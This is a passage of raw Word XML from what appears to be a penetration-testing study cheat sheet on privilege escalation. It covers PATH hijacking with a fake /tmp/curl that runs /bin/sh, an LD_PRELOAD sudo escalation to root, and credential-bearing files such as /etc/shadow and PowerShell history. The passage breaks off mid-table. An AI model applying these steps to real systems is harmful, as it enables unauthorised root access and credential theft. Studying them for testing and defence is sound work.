          <w:p w14:paraId="15AAFC03" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD4B84">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">export </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4B84">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PATH</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4B84">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4B84">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/tmp</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4B84">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4B84">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>$PATH</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D1653DE" w14:textId="1924F48A" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t xml:space="preserve">Use the : to separate entries and </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4B84">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">$PATH </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">to say that you want to keep everything that is already in there, so in the above example you are basically just adding </w:t>
            </w:r>
            <w:r w:rsidRPr="004A734C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/tmp</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r w:rsidRPr="004A734C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PATH</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3BB97B" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>B</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD4B84">
              <w:t>y default, it contains</w:t>
            </w:r>
            <w:r>
              <w:t>…</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00DD4B84">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18F6A25C" w14:textId="23B38AC7" w:rsidR="008261D4" w:rsidRPr="004A734C" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r w:rsidRPr="004A734C">
              <w:t>So, you could create a malicious version of curl for instance</w:t>
            </w:r>
            <w:r>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="004A734C">
              <w:t xml:space="preserve"> by:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="498CCC9F" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
                <w:tab w:val="left" w:pos="1440"/>
                <w:tab w:val="left" w:pos="2160"/>
                <w:tab w:val="left" w:pos="2880"/>
                <w:tab w:val="center" w:pos="3941"/>
              </w:tabs>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004A734C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">echo </w:t>
            </w:r>
            <w:r w:rsidRPr="004A734C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/bin/sh </w:t>
            </w:r>
            <w:r w:rsidRPr="004A734C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004A734C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/tmp/curl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54E91A17" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
                <w:tab w:val="left" w:pos="1440"/>
                <w:tab w:val="left" w:pos="2160"/>
                <w:tab w:val="left" w:pos="2880"/>
                <w:tab w:val="center" w:pos="3941"/>
              </w:tabs>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005656CB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">chmod </w:t>
            </w:r>
            <w:r w:rsidRPr="005656CB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">777 </w:t>
            </w:r>
            <w:r w:rsidRPr="005656CB">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/tmp/curl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F52D52F" w14:textId="07956D0C" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
                <w:tab w:val="left" w:pos="1440"/>
                <w:tab w:val="left" w:pos="2160"/>
                <w:tab w:val="left" w:pos="2880"/>
                <w:tab w:val="center" w:pos="3941"/>
              </w:tabs>
            </w:pPr>
            <w:r w:rsidRPr="005656CB">
              <w:t xml:space="preserve">Remember, this malicious version you create must have the same name as the binary that is called by the executable </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005656CB">
              <w:t>file</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005656CB">
              <w:t xml:space="preserve"> and it can be stored in any location as long as it’s different to the original location and you are allowed to save it in that directory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="2A4D65AC" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1B5595C9" w14:textId="0D45C96B" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>78.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3D5FEDCD" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8098" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22BD8B96" w14:textId="2B9D8DF0" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:tab/>
              <w:t>Useful places to look in Linux/Unix are:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46C90EE6" w14:textId="5B026D34" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r>
              <w:t>/etc/shadow</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●/etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:tab/>
              <w:t>●/dev/shm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">●/var/www/html -&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00622988">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> dashboard.php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:tab/>
              <w:t>●db.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="4CD1C169" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="76424256" w14:textId="1F1876B9" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>78.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="66F7C8B0" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8098" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75D16BF9" w14:textId="565AEC94" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:tab/>
              <w:t>Useful places to look in Windows are:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ADAF40F" w14:textId="2A603A8F" w:rsidR="008261D4" w:rsidRPr="004C3D92" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●ConsoleHost_history.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004C3D92">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Which may be found in…</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="004C3D92">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>C:\Users\</w:t>
            </w:r>
            <w:r w:rsidRPr="004C3D92">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>USERNAME</w:t>
            </w:r>
            <w:r w:rsidRPr="004C3D92">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="6586E368" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="25F5AA72" w14:textId="003E9E90" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>78.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5C988DF6" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8098" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62217191" w14:textId="7932D309" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:tab/>
              <w:t>Useful places to look in Mac are:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="638AF932" w14:textId="380EBCA4" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="3658B5D9" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="02CEEA5F" w14:textId="5C2C8238" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>78.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5701ECF7" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8098" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2277BA80" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>Sometimes, when trying to run a file or script on the target machine, the ‘execute’ permission is not set by default, it may be possible to change this permission using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>chmod</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILENAME.EXTENSION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:t>Here, we have ‘added’ the permission of ‘execute’ to the file specified.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FECB13F" w14:textId="07E2CA4E" w:rsidR="008261D4" w:rsidRPr="009B155E" w:rsidRDefault="008261D4" w:rsidP="008261D4"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="52A7552E" w14:textId="77777777" w:rsidTr="008261D4">
        <w:trPr>
          <w:trHeight w:val="156"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7A91323E" w14:textId="6BCFF58C" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>78.i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2F417B65" w14:textId="2E2977B9" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>netstat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8098" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E27A9BB" w14:textId="777DFB33" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t xml:space="preserve">You can use </w:t>
            </w:r>
            <w:r w:rsidRPr="008261D4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>netstat</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008261D4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-plunt </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">to see active internet connections, this may give you a clue  as to what else can be exploited once in, useful once a reverse netcat shell has been established. For </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>example</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> port 3306 being open points to a connection to a MySQL server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="0D88B69C" w14:textId="77777777" w:rsidTr="008261D4">
        <w:trPr>
          <w:trHeight w:val="648"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="142CEC4E" w14:textId="762C7560" w:rsidR="008261D4" w:rsidRDefault="008918B7" w:rsidP="008261D4">
            <w:r>
              <w:t>78.j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1A721ED7" w14:textId="13A2B38C" w:rsidR="008261D4" w:rsidRDefault="008918B7" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>LD_PRELOAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8098" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2198DDF7" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008918B7" w:rsidP="008261D4">
            <w:r>
              <w:t xml:space="preserve">Run </w:t>
            </w:r>
            <w:r w:rsidRPr="008918B7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo </w:t>
            </w:r>
            <w:r w:rsidRPr="008918B7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
            <w:r>
              <w:t>, and if you see that ‘</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>env_keep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>LD_PRELOAD</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">’ is displayed, there is a good chance that </w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">LD_PRELOAD </w:t>
            </w:r>
            <w:r>
              <w:t>is inherited from the user’s environment. This environment variable loads a shared object before any others when a program is run.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67532533" w14:textId="77777777" w:rsidR="008918B7" w:rsidRDefault="008918B7" w:rsidP="008261D4">
            <w:r>
              <w:t>Effectively meaning we can create a shared object and then run another program that is on the ‘User may run the following commands on this host’ with this object and gain root privileges.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10C268F6" w14:textId="77777777" w:rsidR="008918B7" w:rsidRDefault="008918B7" w:rsidP="008918B7">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1764"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>First of all, use C language complier as such:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19A11BEE" w14:textId="77777777" w:rsidR="00F97558" w:rsidRDefault="00F97558" w:rsidP="00F97558">
            <w:pPr>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>gcc</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-fPIC -shared -nostartfiles -o</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/tmp/preload.so </w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>/home/USER/preload.c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="581912C3" w14:textId="77777777" w:rsidR="00F97558" w:rsidRPr="00F97558" w:rsidRDefault="00F97558" w:rsidP="00F97558">
            <w:r w:rsidRPr="00F97558">
              <w:t xml:space="preserve">Now, run one of those </w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t xml:space="preserve">programs </w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:t xml:space="preserve">allowed to run with </w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:t xml:space="preserve">(check with </w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:t>):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2715E1EB" w14:textId="51DC2B29" w:rsidR="00F97558" w:rsidRDefault="00F97558" w:rsidP="00F97558">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>LD_PRELOAD</w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/tmp/preload.so </w:t>
            </w:r>
            <w:r w:rsidRPr="00F97558">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>PROGRAM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
